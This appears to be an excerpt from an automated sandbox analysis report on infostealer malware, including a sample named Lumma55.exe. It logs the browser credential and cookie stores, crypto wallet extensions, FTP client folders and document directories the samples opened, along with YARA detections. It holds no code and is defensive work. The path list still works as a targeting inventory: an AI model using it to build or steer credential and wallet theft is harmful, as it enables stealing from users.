Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Searches for user specific document files
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Directory queried: C:\Users\user\Documents
Yara detected Credential Stealer
Source: Yara match File source: 0000000A.00000003.2804105277.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2777133880.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2576638157.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2748097190.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2774328933.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2577284988.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2748344769.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2502644685.00000000012B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2722048174.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2808373919.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2805048673.00000000008D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2550423732.00000000012B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
